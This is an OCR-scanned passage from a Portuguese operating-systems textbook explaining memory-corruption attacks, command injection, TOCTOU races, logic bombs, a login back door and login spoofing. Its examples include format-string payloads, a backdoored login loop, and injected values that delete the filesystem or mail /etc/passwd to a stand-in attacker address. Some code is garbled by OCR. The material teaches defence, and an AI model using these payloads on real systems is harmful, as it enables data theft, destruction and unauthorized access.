ASLR muitas vezes não é aleatória o suficiente. Muitas 
implementações da ASLR ainda têm alguns códigos 
em locais fixos. Além disso, mesmo se um segmento 
é randomizado, a randomização pode ser fraca, de ma- 
neira que um atacante pode vencê-la por força bruta. 
Por exemplo, em sistema de 32 bits, a entropia pode ser 
limitada porque você não consegue randomizar todos 
os bits da pilha. Para manter a pilha funcionando como 
uma pilha regular que cresce para baixo, randomizar os 
bits menos significativos não é uma opção. 

Um ataque mais importante contra a ASLR é forma- 
do por liberações de memória. Nesse caso, o atacante 
usa uma vulnerabilidade não para assumir o controle 
do programa diretamente, mas em vez disso para vazar 
informações sobre o layout de memória, que ele então 
pode usar para explorar uma segunda vulnerabilidade. 
Como um exemplo trivial, considere o código a seguir: 


01. void C() { 

02. int index; 

03. int primo [16] = { 1,2,3,5,7,11,13,17,19,23,29, 
31,37,41 43,47 y; 

04. printf (“Qual numero primo entre voce gostaria 
de ver?”); 


05. index=ler entrada usuario ( ); 


06. printf (“Numero primo %d e: %d\n”, indice, 
primofindice]); 
07.} 


O código contém uma chamada para ler entrada | 
usuario que não faz parte da biblioteca C padrão. Ape- 
nas presumimos que ela existe e retorna um inteiro que 
o usuário digita na linha de comando. Também supo- 
mos que ela não contém erro algum. Mesmo assim, para 
esse código é muito fácil vazar informações. Tudo o que 
precisamos fazer é fornecer um índice que seja maior 
do que 15, ou menor do que 0. Como o programa não 
confere o índice, ele retornará com satisfação o valor de 
qualquer inteiro na memória. 

O endereço de uma função é muitas vezes suficiente 
para um ataque bem-sucedido. A razão é que embora 
a posição na qual a biblioteca está carregada possa ser 
randomizada, o deslocamento relativo para cada função 
individual dessa posição geralmente é fixo. Colocando 
a questão de maneira diferente: se você conhece uma 


função, você conhece todas. Mesmo que esse não seja 
o caso, com apenas um endereço de código, muitas ve- 
zes é fácil encontrar muitas outras, como mostrado por 
Snow et al. (2013). 


Ataques de desvio de fluxo sem obtenção 
de controle 


Até o momento, consideramos ataques sobre o fluxo 
de controle de um programa: modificando ponteiros de 
função e endereços de retorno. A meta sempre foi fazer 
o programa executar uma nova funcionalidade, mesmo 
que ela fosse reciclada de um código já presente no bi- 
nário. No entanto, essa não era a única possibilidade. 
Os dados em si podem ser um alvo interessante para o 
atacante também, como no fragmento a seguir de um 
pseudocódigo: 


01. void A() { 
02. int autorizado; 
03. nome char [128]; 


04. autorizado = confere credenciais (...); /* o ata- 
cante nao e autorizado, entao retornar O */ 


05. printf (“Qual e o seu nome An”; 
06. gets (nome); 
07. if (autorizado != 0) { 


08. printf (“bem vindo %s, aqui estao todos os 
seus dados secretosin”, nome) 


09. /* ... mostrar dados secretos ... */ 

10. }else 

11. printf (“desculpe %s, mas voce nao esta 
autorizado Mn”); 

12. } 

13.) 


A função do código é fazer uma conferência de auto- 
rização. Apenas usuários com as credenciais certas têm 
permissão para ver os dados mais secretos. A função 
confere credentiais não é uma função da biblioteca C, 
mas presumimos que ela exista em alguma parte no pro- 
grama e não contenha erro algum. Agora suponha que o 
atacante digite 129 caracteres. Como no caso anterior, 
o buffer vai transbordar, mas não modificará o ende- 
reço de retorno. Em vez disso, o atacante modificou o 
valor da variável autorizada, dando a ela um valor que 
não é 0. O programa não quebra e não executa o código 
do atacante, mas ele vaza a informação secreta para um 
usuário não autorizado. 
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Transbordamentos de buffer — nem perto do fim 


Transbordamentos de buffer estão entre as técnicas 
de corrupção de memória mais antigas e importantes 
usadas por atacantes. Apesar de mais de um quarto de 
século de incidentes, e uma miríade de defesas (trata- 
mos apenas das mais importantes), parece impossível 
livrar-se delas (VAN DER VEEN, 2012). Por todo esse 
tempo, uma fração substancial de todos os problemas 
de segurança são decorrentes dessa falha, que é difícil 
de consertar por haver tantos programas C por aí que 
não conferem o transbordamento de buffer. 

A corrida evolutiva não está nem perto do seu 
fim. Mundo afora, pesquisadores estão investigando 
novas defesas. Algumas delas são focadas em biná- 
rios, outras consistem na extensão de segurança para 
compiladores C e C++. É importante enfatizar que os 
atacantes também estão melhorando suas técnicas de 
exploração. Nesta seção, tentamos dar uma visão geral 
de algumas das técnicas mais importantes, mas exis- 
tem muitas variações da mesma ideia. A única coisa de 
que estamos bastantes certos é que na próxima edição 
deste livro, esta seção ainda será relevante (e provavel- 
mente mais longa). 


9.7.2 Ataques por cadeias de caracteres de 
formato 


O próximo ataque também é de corrupção de memó- 
ria, mas de uma natureza muito diferente. Alguns pro- 
gramadores não gostam de digitar, mesmo que sejam 
excelentes nisso. Por que nomear uma variável referen- 
ce count quando rc obviamente significa a mesma coisa 
e poupa 13 digitações a cada ocorrência? Essa aversão à 
digitação pode levar, às vezes, a falhas catastróficas do 
sistema como descrito a seguir. 

Considere o fragmento a seguir de um programa C 
que imprime a saudação C no inicio do programa: 


char *s="Ola Mundo”; 
printf(“%s”, s); 


Nesse programa, a variável da string s é declarada e 
inicializada para uma string consistindo em “Ola Mundo” 
e um byte zero para indicar o fim da string. A chamada 
para a função printf tem dois argumentos, a string de for- 
mato “%s”, que a instrui para imprimir uma string, e o 
endereço da string. Quando executado, esse fragmento de 
código imprime a string na tela (ou onde quer que a saída 
padrão vá). Ela está correta e é à prova de balas. 
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Mas suponha que o programador tenha preguiça e, 
em vez dessa string, digite: 


char *s=“Ola Mundo”; 
printf(s); 


Essa chamada para printf é permitida porque printf 
tem um número variável de argumentos, dos quais o pri- 
meiro deve ser a string de formatação. Mas uma string 
não contendo informação de formatação alguma (como 
“%s”) é legal, então embora a segunda versão não seja 
uma boa prática de programação, ela é permitida e vai 
funcionar. Melhor ainda, ela poupa a digitação e cinco 
caracteres, evidentemente uma grande vitória. 

Seis meses mais tarde, algum outro programador é 
instruído a modificar o código para primeiro pedir ao 
usuário o seu nome, então cumprimentá-lo pelo nome. 
Após estudar o código de certa maneira apressadamen- 
te, ele o muda um pouco, da seguinte forma: 


char s[100], g[100] = “Ola “; /* declare se g; 
inicialize g */ 

/* leia uma string do 
teclado em s */ 

/* concatene s ao fim 
de g */ 

/* imprima g */ 


gets(s); 
strcat(g, s); 


printf(g); 


Agora ele lê uma string na variável s e a concatena a 
string inicializada g para construir a mensagem de saida 
em g. Ainda funciona. Por ora tudo bem (exceto pelo 
uso de gets, que é sujeito a ataques de transbordamento 
do buffer, mas ainda é popular). 

No entanto, um usuário conhecedor do assunto que 
viu esse código rapidamente percebeu que a entrada 
aceita do teclado não é apenas uma string; ela é uma 
string de formato, como tal todas as especificações de 
formato permitidas por printf funcionarão. Embora a 
maioria dos indicadores de formatação com “Y%s” (para 
imprimir strings) e “%d” (para imprimir inteiros deci- 
mais) formatem a saída, dois são especiais. Em particu- 
lar “Yn” não imprime nada. Em vez disso, ele calcula 
quantos caracteres já deveriam ter sido enviados no lu- 
gar em que eles aparecem na string e os armazena no 
próximo argumento para printf para serem processados. 
A seguir um exemplo de programa usando “%n”: 


int main(int argc, char *argv[]) 


{ 
int i=0; 
printf(“Ola %nmundo\n”, &i);  /* o %n 
armazena em i */ 
printf(“i=Y%ed\n’,i); /*i agorae 4 */ 
} 


Quando esse programa é compilado e executado, a 
saída que ele produz na tela é: 


Ola mundo 
i=4 


Observe que a variável 7 foi modificada por uma cha- 
mada para printf, algo que não é óbvio para todos. Em- 
bora essa característica seja útil bem de vez em quando, 
ela significa que imprimir uma string de formatação pode 
fazer com que uma palavra — ou muitas palavras — se- 
jam armazenadas na memória. Foi uma boa ideia incluir 
essa característica em print? Definitivamente não, mas 
ela pareceu tão prática à época. Uma grande quantidade 
de vulnerabilidades de software começou assim. 

Como vimos no exemplo anterior, por acidente o 
programador que modificou o código permitiu que o 
usuário do programa inserisse (inadvertidamente) uma 
string de formatação. Como imprimir uma string de for- 
matação pode sobrescrever a memória, agora temos as 
ferramentas necessárias para sobrescrever o endereço 
de retorno da função printf na pilha e saltar para outro 
lugar, por exemplo, em uma string de formato recente- 
mente inserida. Essa abordagem é chamada de um ata- 
que por string de formato. 

Realizar um ataque por string de formato não é algo 
exatamente trivial. Onde será armazenado o número de 
caracteres que a função imprimiu? Bem, no endereço 
do parâmetro seguindo a própria string de formatação, 
como no exemplo mostrado. Mas no código vulnerável, 
o atacante poderia fornecer apenas uma string (e nenhum 
segundo parâmetro para printf). Na realidade, o que vai 
acontecer é que a função printf vai presumir que existe 
um segundo parâmetro. Ela vai apenas tomar o próximo 
valor na pilha e usá-lo. O atacante também pode fazer o 
printf usar o próximo valor na pilha, por exemplo, forne- 
cendo a string de formato a seguir como entrada: 


“%08x %n” 


O “%08x” significa que printf imprimirá o próximo 
parâmetro como um número hexadecimal de 8 dígitos. 
Então se aquele valor é /, ele imprimirá 0000001. Em 
outras palavras, com essa string de formatação, printf 
simplesmente presumirá que o próximo valor na pilha 
é um número de 32 bits que ele deveria imprimir, e o 
valor depois disso é o endereço da locação onde ele 
deveria armazenar o número de caracteres impressos, 
nesse caso 9: 8 para o número hexadecimal e um para o 
espaço. Suponha que ele forneça a string de formatação 


“%08X %08x Yon” 


Nesse caso, printf armazenara o valor do endere- 
ço fornecido pelo terceiro valor seguindo a string de 


formato na pilha, e assim por diante. Isso é fundamental 
para a string de formato inserir um defeito em uma pri- 
mitiva “escrever qualquer coisa em qualquer lugar” por 
um atacante. Os detalhes estão além deste livro, mas a 
ideia é que o atacante se certifique de que o endereço 
alvo certo está na pilha. Isso é mais fácil do que você 
possa pensar. Por exemplo, no código vulnerável que 
apresentamos anteriormente, a string g está em si tam- 
bém na pilha, em um endereço superior ao quadro de 
pilha de printf (ver Figura 9.24). Vamos presumir que 
a string começa como mostrado na Figura 9.24, com 
“AAAA”, seguido por uma sequência de “%0x” e ter- 
minando com “%0n”. O que acontecerá? Bem, se o 
atacante acertar o número de “%0x”s, ele terá atingido 
a própria string de formato (armazenada no buffer B). 
Em outras palavras, printf usará então os primeiros 4 
bytes da string de formato como o endereço para o qual 
escreverá. Como o valor ASCII do caractere 4 é 65 (ou 
0x41 em hexadecimal), ele escreverá o resultado no lo- 
cal 0x41414141, mas o atacante pode especificar outros 
endereços também. É claro, ele deve certificar-se de que 
o número de caracteres impressos seja exatamente o 
certo (porque é isso que será escrito no endereço alvo). 
Na prática, há pouco mais a respeito disso do que essa 
questão, mas não muito mais. Se digitar: “format string 
attack” ou “ataques por string de formato” em qualquer 
mecanismo de busca da internet, você encontrará mui- 
tas informações a respeito do problema. 


a (elu) TEZI Um ataque por string de formato. Ao utilizar 
exatamente o número certo de %08x, o atacante 


pode usar os primeiros quatro caracteres da string 
de formato como um endereço. 


Buffer B 


E 

o 
EN 
x 
do 
a 
EN 
x 
do 
Q 
EN 
x 
do 
Q 
z 


primeiro parâmetro para printf 
(ponteiro para string de formato) 





quadro da 
pilha de printf | 
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Assim que 0 usuario tiver a capacidade de sobrescre- 
ver a memória e forçar um salto para um código recen- 
temente injetado, o código terá todo o poder e acesso 
que o programa atacado tem. Se o programa tem uma 
raiz SETUID, o atacante pode criar um shell com privi- 
légios de raiz. Como nota, o uso de arranjos de carac- 
teres de tamanho fixo nesse exemplo também poderia 
estar sujeito a um ataque por transbordamento de buffer. 


9.7.3 Ponteiros pendentes 


Uma terceira técnica de corrupção de memória 
que é muito popular mundo afora é conhecida como 
ataque por ponteiros pendentes (dangling pointers). A 
manifestação mais simples da técnica é bastante fá- 
cil de compreender, mas gerar uma exploração pode 
ser complicado. C e C++ permitem que um programa 
aloque memória sobre uma pilha usando a chamada 
malloc, que retorna um ponteiro para uma porção de 
memória recentemente alocada. Mais tarde, quando o 
programa não precisa mais dela, ele chama free para 
liberar a memória. Um erro de ponteiro pendente ocor- 
re quando o programa acidentalmente usa a memória 
após ele já a ter liberado. Considere o código a seguir 
que discrimina contra pessoas (realmente) velhas: 


01. int*A = (int *) malloc (128); /* alocar espaco 
para 128 inteiros */ 
02. intano de nascimento = /* ler um inteiro da 

ler entrada do usuario (); entrada padrao 
03. if (ano de nascimento < 1900) « 


04. printf (Erro, ano de nascimento deve ser 
maior do que 1900 An”); 


05. free(A); 
06. }else { 
07. 


08. /* fazer algo interessante com arranjo A */ 

09. 

10. } 

11. .../* muito mais declaracoes, contendo malloc 
e free */ 

12. A[0]= ano de nascimento; 


O código está errado. Não apenas pela discriminação 
de idade, mas também porque na linha 12 ele pode de- 
signar um valor para um elemento do arranjo 4 após ele 
já ter sido liberado (na linha 5). O ponteiro A ainda vai 
apontar para o mesmo endereço, mas ele não deve mais 


452) | SISTEMAS OPERACIONAIS MODERNOS 


ser usado. Na realidade, a memória talvez já tenha sido 
reutilizada por outro buffer a essa altura (ver linha 11). 

A questão é: o que vai acontecer? O armazenamento 
na linha 12 tentará atualizar a memória que não está mais 
em uso para o arranjo 4, e pode muito bem modificar 
uma estrutura de dados diferente que agora vive nessa 
área de memória. Em geral, essa corrupção de memória 
não é uma boa coisa, mas ela fica ainda pior se o atacante 
for capaz de manipular o programa de tal maneira que 
ele coloque um objeto específico do heap naquela me- 
mória na qual o primeiro inteiro do objeto contém, diga- 
mos, o nível de autorização do usuário. Isso nem sempre 
é fácil de fazer, mas existem técnicas (conhecidas como 
heap feng shui) para ajudar atacantes a conseguirem 
isso. Feng Shui é a antiga arte chinesa de orientar pré- 
dios, tumbas e memória sobre os montes (heap) de uma 
maneira auspiciosa. Se o mestre de feng shui digital tiver 
sucesso, ele pode agora estabelecer o nível de autoriza- 
ção para qualquer valor (bem, até 1900). 


9.7.4 Ataques por dereferência de ponteiro nulo 


Algumas centenas de páginas atrás, no Capítulo 3, 
discutimos o gerenciamento de memória em detalhes. 
Você deve se lembrar de como os sistemas operacionais 
modernos virtualizam os espaços de endereçamento dos 
processos do núcleo e do usuário. Antes que um pro- 
grama acesse um endereço de memória, a MMU tra- 
duz aquele endereço virtual para um endereço físico por 
meio de tabelas de páginas. Páginas que não são mape- 
adas não podem ser acessadas. Parece lógico presumir 
que o espaço de endereçamento do núcleo e o espaço de 
endereçamento de um processo do usuário sejam com- 
pletamente diferentes, mas esse nem sempre é o caso. 
No Linux, por exemplo, o núcleo é simplesmente mape- 
ado no espaço de endereçamento de todos os processos 
e sempre que o núcleo começar a executar para tratar 
de uma chamada de sistema, ele vai executar no espa- 
ço de endereçamento do processo. Em um sistema de 
32 bits, o espaço do usuário ocupa os últimos 3 GB do 
espaço de endereçamento e o núcleo, o 1 GB de cima. 
A razão para essa coabitação é a eficiência — o chavea- 
mento entre espaços de endereçamento é caro. 

Em geral esse arranjo não causa problema algum. A 
situação muda quando o atacante pode fazer o núcleo 
chamar funções no espaço do usuário. Por que o núcleo 
faria isso? Está claro que ele não deveria. No entanto, 
lembre-se de que estamos falando de defeitos. Um nú- 
cleo com defeitos pode encontrar-se em circunstâncias 
raras e infelizes e dereferenciar acidentalmente um pon- 
teiro NULL. Por exemplo, ele pode chamar uma função 


usando um ponteiro de função que não foi inicializado 
ainda. Em anos recentes, vários desses defeitos foram 
descobertos no núcleo do Linux. Uma dereferência de 
ponteiro nulo é um negócio ruim mesmo, pois ele geral- 
mente leva a uma quebra. Ele é ruim o suficiente em um 
processo do usuário, à medida que derrubar o programa, 
mas é pior ainda no núcleo, pois atacante derruba o sis- 
tema inteiro. 

Às vezes é pior ainda quando um atacante é capaz de 
disparar a dereferência de ponteiro nulo a partir do pro- 
cesso do usuário. Nesse caso, ele pode derrubar o siste- 
ma sempre que quiser. No entanto, derrubar um sistema 
não vai impressionar os seus amigos crackers — eles 
querem ver o shell. 

A queda acontece porque não há um código mape- 
ado na página 0. Então o atacante pode usar a função 
especial, mmap, para remediar isso. Com mmap, um 
processo de usuário pode pedir ao núcleo para mapear a 
memória em um endereço específico. Após mapear uma 
página no endereço 0, o atacante pode escrever o código 
de shell em sua página. Por fim, ele dispara a dereferên- 
cia de ponteiro nulo, fazendo com que o código de shell 
seja executado com privilégios de núcleo. Todos ficam 
impressionados. 

Em núcleos modernos, não é mais possível fazer o 
mmap de uma página no endereço 0. Mesmo assim, mui- 
tos núcleos mais antigos ainda são usados mundo afora. 
Além disso, o truque também funciona com ponteiros 
que têm valores diferentes. Em alguns defeitos de có- 
digo, o atacante pode ser capaz de injetar o seu próprio 
ponteiro no núcleo e tê-lo dereferenciado. As lições que 
aprendemos dessa exploração é que as interações núcleo- 
-usuário podem aparecer em lugares inesperados e que 
otimizações para melhorar o desempenho podem apare- 
cer para assombrá-lo na forma de ataques mais tarde. 


9.7.5 Ataques por transbordamento de inteiro 


Os computadores realizam aritmética em números 
de comprimento fixo, em geral com 8, 16, 32, ou 64 bits 
de comprimento. Se a soma de dois números a serem 
adicionados ou multiplicados excede o inteiro máximo 
que pode ser representado, ocorre um transbordamento 
(overflow). Programas C não pegam esse erro; eles ape- 
nas armazenam e usam o valor incorreto. Em particular, 
se as variáveis são inteiros com sinal, então o resultado 
de adicionar ou multiplicar dois inteiros positivos pode 
ser armazenado como um inteiro negativo. Se as vari- 
áveis não possuem sinal, os resultados serão positivos, 
mas irão recomeçar do zero. Por exemplo, considere 
dois inteiros de 16 bits sem sinal cada um contendo o 


valor de 40.000. Se eles forem multiplicados juntos e o 
resultado armazenado em outro inteiro de 16 bits sem 
sinal, o produto aparente é 4096. Claramente isso é in- 
correto, mas não é detectado. 

Essa capacidade para causar transbordamentos 
numéricos não detectados pode ser transformada em 
um ataque. Uma maneira de realizar isso é fornecer um 
programa dois parâmetros válidos (mas grandes) no 
conhecimento de que eles serão adicionados ou mul- 
tiplicados e resultarão em um transbordamento. Por 
exemplo, alguns programas gráficos têm parâmetros de 
linha de comando dando a altura e a largura de um ar- 
quivo de imagem, por exemplo, o tamanho para o qual 
uma imagem de entrada será convertida. Se a altura e a 
largura são escolhidas para forçar um transbordamento, 
o programa calculará incorretamente quanta memória é 
necessária para armazenar a imagem e chamar malloc 
para alocar um buffer pequeno demais para ele. A situ- 
ação agora está pronta para um ataque por transborda- 
mento de buffer. Explorações similares são possíveis 
quando a soma ou o produto de inteiros positivos com 
sinal resulta em um inteiro negativo. 


9.7.6 Ataques por injeção de comando 


Outra exploração ainda consiste em conseguir que 
o programa alvo execute comandos sem dar-se conta 
que ele o está fazendo. Considere um programa que em 
determinado ponto precisa duplicar algum arquivo for- 
necido pelo usuário sob um nome diferente (talvez um 
backup). Se o programador for preguiçoso demais para 
escrever o código, ele pode usar a função system, que 
inicia um shell e executa o seu argumento como um co- 
mando de shell. Por exemplo, o código C 


system(“s >file-list”) 
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inicia um shell que executa o comando 
Is >file-list 


listando todos os arquivos no diretório atual e escreven- 
do-os para um arquivo chamado file-list. O código que 
o programador preguiçoso poderia usar para duplicar o 
arquivo é dado na Figura 9.25. 

O que o programa faz é pedir os nomes dos arquivos 
fonte e destino, construir uma linha de comando usando 
cp, e então chamar system para executá-lo. Suponha que 
o usuário digite “abc” e “xyz” respectivamente, então o 
comando que o shell executará é 


cp abc xyz 


que realmente copia o arquivo. 

Infelizmente, esse código abre um rombo de segu- 
rança gigantesco, usando uma técnica chamada injeção 
de comando. Suponha que o usuário digite “abc” e 
“xyz; rm -rf /” em vez disso. O comando que é cons- 
truído e executado agora é 


cp abc xyz; rm —rf / 


que primeiro copia o arquivo, então tenta remover recur- 
sivamente cada arquivo e cada diretório do sistema de ar- 
quivos inteiro. Se o programa está executando como um 
superusuário, ele pode muito bem ter sucesso. O proble- 
ma, é claro, é que tudo após o ponto e vírgula é executado 
como um comando shell. 

Outro exemplo do segundo argumento poderia ser 
“xyz; mail snooper@badguys.com </etc/passwd”, que 
produz 


cp abc xyz; mail snooper @bad-guys.com </etc/passwd 


desse modo enviando o arquivo de senha para um ende- 
reço desconhecido e não confiável. 


ei: TEF Código que pode levar a um ataque por injeção de comando. 


int main(int argc, char *argv[]) 

{ 
char src[100], dst[100], cmd[205] = “cp “; 
printf(“Por favor entrar nome do arquivo fonte: “); 
gets(src); 
strcat(cmd, src); 
strcat(cmd, “ “); 
printf(“Por favor entrar nome do arquivo de destino: “); 
gets(dst); 
strcat(cmd, dst); 
system(cmd); 


/* declara 3 cadeias */ 

/* pede por arquivo fonte */ 

/* obtem entrada do teclado */ 

/* concatena src apos cp */ 

/* adiciona um espaço ao final de cmd */ 
/* pede por nome do arquivo de saida */ 
/* obtem entrada do teclado */ 

/* completa a string de comandos */ 

/* executa o comando cp */ 
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9.7.7 Ataques de tempo de verificagao para tempo 
de uso 


O ultimo ataque nesta seção é de uma natureza muito 
diferente. Ele não tem nada a ver com a corrupção de 
memória ou injeção de comando. Em vez disso, ele ex- 
plora as condições de corrida. Como sempre, ele pode 
ser mais bem ilustrado com um exemplo. Considere o 
código a seguir: 

int fd; 

if (access (“./my document”, W OK) != 0) { 

exit (1); 

fd = open (*./my document”, O WRONLY) 

write (fd, user. input, sizeof (user input)); 


Presumimos de novo que o programa tem uma SE- 
TUID root e o atacante quer usar os seus privilégios 
para escrever no arquivo de senha. É claro, ele não 
tem permissão de escrita para o arquivo de senha, mas 
vamos dar uma olhada no código. A primeira coisa 
que observamos é que o programa SETUID não de- 
veria escrever no arquivo de senha — ele apenas quer 
escrever para um arquivo chamado “my document” 
no diretório de trabalho atual. No entanto, embora 
um usuário possa ter esse arquivo no seu diretório de 
trabalho atual, isso não quer dizer que ele realmen- 
te tenha permissão de escrita para esse arquivo. Por 
exemplo, o arquivo poderia ser um link simbólico para 
outro arquivo que não pertence ao usuário, por exem- 
plo, o arquivo de senha. 

Para evitar isso, o programa realiza uma conferência 
para ter certeza de que o usuário tem acesso de escrita 
para o arquivo através da chamada de sistema access. 
A chamada confere o arquivo real (isto é, se ele for um 
link simbólico, ele será dereferenciado), retornando 0 se 
o acesso solicitado for permitido e um valor de erro de 
-1 de outra maneira. Além disso, a conferência é leva- 
da adiante com o UID real do processo chamador, em 
vez do UID efetivo (porque de outra forma um processo 
SETUID sempre teria acesso). Apenas se a verificação 
tiver sucesso o programa prosseguirá para abrir o arqui- 
vo e escrever a entrada do usuário nele. 

O programa parece seguro, mas não é. O problema é 
que o tempo de conferência de processo para privilégios 
e o tempo no qual os privilégios são usados não são os 
mesmos. Presuma que uma fração de um segundo após 
a verificação por access, o atacante consegue criar uma 
ligação simbólica com o mesmo nome de arquivo para 
o arquivo de senha. Nesse caso, o open abrirá o arquivo 
errado, e a escrita dos dados do atacante terminarão no 


arquivo de senha. Para conseguir isso, o atacante tem de 
correr com o programa para criar a ligação simbólica 
exatamente no tempo certo. 

O ataque é conhecido como ataque TOCTOU (Time 
of Check to Time of Use — Tempo de verificação para 
o tempo de uso). Outra maneira de examinar esse ata- 
que em particular é observar que a chamada de sistema 
access simplesmente não é segura. Seria muito melhor 
abrir o arquivo primeiro, e então conferir as permissões 
usando o descritor de arquivo em vez disso — usando a 
função fstat. Descritores de arquivos são seguros, pois 
eles não podem ser modificados pelo atacante entre as 
chamadas fstat e write. Ele mostra que projetar um bom 
API para um sistema operacional é algo extremamente 
importante e relativamente difícil. Nesse caso, os proje- 
tistas se equivocaram. 


9.8 Ataques internos 


Uma categoria completamente diferente de ataques é 
o que poderia ser chamado de “trabalhos internos”. Eles 
são executados por programadores e outros empregados 
da empresa executando o computador a ser protegido ou 
produzindo um software crítico. Eles diferem dos ata- 
ques externos, pois as pessoas de dentro do sistema têm 
um conhecimento especializado e acesso que as pesso- 
as de fora não têm. A seguir daremos alguns exemplos; 
todos eles ocorreram repetidamente no passado. Cada 
um tem um aspecto diferente em termos de quem está 
realizando o ataque e daquilo que o atacante está ten- 
tando atingir. 


9.8.1 Bombas lógicas 


Em tempos de terceirizações em massa, programado- 
res muitas vezes preocupam-se com os seus trabalhos. 
Às vezes eles dão passos para tornar sua partida (in- 
voluntária) potencial menos dolorosa. Para aqueles que 
são inclinados à chantagem, uma estratégia é escrever 
uma bomba lógica. Esse dispositivo é um fragmento 
de código escrito por um dos programadores (atualmen- 
te empregados) da empresa e secretamente inserido no 
sistema de produção. Enquanto o programador alimen- 
tar sua senha diária, esse fragmento de código não fará 
nada. No entanto, se o programador for subitamente 
despedido e fisicamente removido do local sem aviso, 
no dia seguinte (ou semana seguinte) a bomba lógica 
não será alimentada com sua senha diária e detonada. 
Muitas variantes desse tema também são possíveis. Em 
um caso famoso, a bomba lógica verificava a folha de 


pagamento. Se o número pessoal do programador não 
aparecesse nela por dois períodos de pagamento conse- 
cutivos, ela detonava (SPAFFORD et al., 1989). 

Detonar poderia envolver limpar o disco, apagar ar- 
quivos de forma aleatória, cuidadosamente fazer mu- 
danças difíceis de serem detectadas em programas 
fundamentais, ou criptografar arquivos essenciais. No 
último caso, a companhia tem a difícil escolha entre cha- 
mar a polícia (que pode ou não resultar em uma condena- 
ção muitos meses depois, mas certamente não recupera 
os arquivos perdidos) ou ceder à chantagem e recontratar 
o ex-programador como um “consultor” por uma quantia 
astronômica para solucionar o problema (e esperar que 
ele não plante novas bombas lógicas enquanto faz isso). 

Ocorreram casos registrados nos quais um vírus 
plantou uma bomba lógica nos computadores que ele 
infectou. Em geral, essas eram programadas para de- 
tonar todas juntas em alguma data e tempo no futuro. 
No entanto, tendo em vista que o programador não faz 
ideia antecipadamente de quais computadores serão 
atingidos, bombas lógicas não podem ser usadas para a 
proteção de empregos e chantagem. Muitas vezes elas 
são configuradas para detonar em uma data que tem al- 
gum significado político. Às vezes elas são chamadas 
de bombas-relógio. 


9.8.2 Back door (porta dos fundos) 


Outra falha de segurança causada por uma pessoa de 
dentro do sistema é a porta dos fundos (back door). 
Esse problema é criado por um código inserido no sis- 
tema por um programador para driblar alguma verifi- 
cação normal. Por exemplo, um programador poderia 
acrescentar um código para o programa de login para 
permitir que qualquer pessoa se conectasse usando o 
nome de login “zzzzz”, não importa qual fosse o arquivo 
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de senha. O código normal no programa de login pode- 
ria se parecer com a Figura 9.26(a). O alçapão mudaria 
para a Figura 9.26(b). 

O que a chamada strcmp faz é conferir se o nome de 
login é “zzzzz”. Se afirmativo, o login foi bem-sucedi- 
do, não importa qual tenha sido a senha digitada. Se o 
código back door fosse inserido por um programador 
trabalhando para uma fabricante de computadores e en- 
tão enviado com seus computadores, o programador po- 
deria conectar-se com qualquer computador produzido 
por sua empresa, não importa quem fosse seu proprietá- 
rio ou o que estava no seu arquivo de senhas. O mesmo 
vale para um programador trabalhando para o vendedor 
do sistema operacional. Back door simplesmente passa 
por todo o processo de autenticação. 

Uma maneira para as empresas evitarem back door é 
ter revisões de código como uma prática padrão. Com 
essa técnica, uma vez que um programador tenha termi- 
nado de escrever e testar um módulo, este é conferido 
em um banco de dados de código. Periodicamente, to- 
dos os programadores de uma equipe se reúnem e cada 
um se levanta na frente do grupo para explicar o que o 
seu código faz, linha por linha. Não apenas isso aumen- 
ta muito a chance de alguém encontrar um back door, 
como torna mais arriscado tentar algo para o progra- 
mador, pois ser pego em flagrante provavelmente não 
será interessante para sua carreira. Se os programadores 
protestarem demais quando isso for proposto, fazer com 
que dois colegas confiram o código um do outro tam- 
bém é uma possibilidade. 


9.8.3 Mascaramento de login 


Nesse ataque de dentro do sistema, o atacante é um usuá- 
rio legítimo que está tentando conseguir as senhas de outras 
pessoas através de uma técnica chamada mascaramento 


les TER] (a) Código normal. (b) Código com back door (porta dos fundos) inserida. 


while (TRUE) { 
printf(“login:”); 
get_string(name); 
disable_echoing( ); 
printf(“password: “); 
get_string(password); 
enable_echoing( ); 
v = check_validity(name, password); 
if (v) break; 

} 

execute_shell(name); 


(a) 


while (TRUE) { 
printf(“login: “); 
get_string(name); 
disable_echoing( ); 
printf(“password: “); 
get_string(password); 
enable_echoing( ); 
v = check_validity(name, password); 
if (v Il stremp(name, “zzzzz”) == 0) break; 
} 
execute_shell(name); 


(b) 
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de login (login spoofing). Ela é tipicamente empregada 
em organizações com muitos computadores públicos em 
uma LAN usados por múltiplos usuários. Muitas univer- 
sidades, por exemplo, têm salas cheias de máquinas onde 
os estudantes podem conectar-se a qualquer computador. 
O ataque funciona da seguinte forma. Em geral, quando 
ninguém está conectado em um computador UNIX, uma 
tela similar àquela da Figura 9.27(a) é exibida. Quando um 
usuário se senta e digita um nome de login, o sistema pede 
pela senha. Se ela estiver correta, o usuário está conectado 
e um shell (e possivelmente um GUN) é inicializado. 

Agora considere esse cenário. Um usuário malicio- 
so, Mal, escreve um programa para exibir a tela da Fi- 
gura 9.27(b). Ela se parece incrivelmente com a tela da 
Figura 9.27(a), exceto que esse não é o programa de 
login do sistema executando, mas um adulterado escri- 
to por Mal. Mal agora inicializa seu programa de login 
adulterado e se distancia para se divertir observando de 
uma distância segura. Quando um usuário se senta e di- 
gita um nome de login, o programa responde pedindo 
por uma senha e desabilitando a exibição do que está 
sendo digitado. Após o nome de login e senha terem 
sido coletados, eles são escritos para um arquivo e o 
programa de login adulterado envia um sinal para matar 
seu shell. Essa ação desconecta Mal e aciona o progra- 
ma de login real para inicializar e exibir a tela da Figura 
9.27(a). O usuário presume que cometeu um erro de di- 
gitação e simplesmente conecta-se de novo. Dessa vez, 
no entanto, funciona. Mas nesse meio tempo, Mal ad- 
quiriu outro par (nome de login, senha). Ao conectar-se 
em muitos computadores e começar o ataque de login 
em todos eles, ele pode coletar muitas senhas. 

A única maneira real de evitar isso é fazer com que 
a sequência de login comece com uma combinação que 
os programas do usuário não possam pegar. O Windows 
usa CTRL-ALT-DEL para esse fim. Se um usuário 
senta em um computador e começa primeiro digitan- 
do CTRL-ALT-DEL, o usuário atual é desconectado e 
o programa de login do sistema é inicializado. Não há 
como driblar esse mecanismo. 


eE (a) Tela de login correta. (b) Tela de login 
adulterada. 


Usuário: Usuário: 





(b) 


9.9 Malware 


Nos tempos antigos (digamos, antes de 2000), ado- 
lescentes entediados (mas inteligentes) passavam suas 
horas de ócio escrevendo softwares maliciosos que eles 
então liberavam no mundo apenas por diversão. Esse 
software, que incluía cavalos de Troia, vírus e worms e 
coletivamente era chamado de malware, muitas vezes 
se espalhava rapidamente mundo afora. À medida que 
os relatórios eram publicados sobre quantos milhões de 
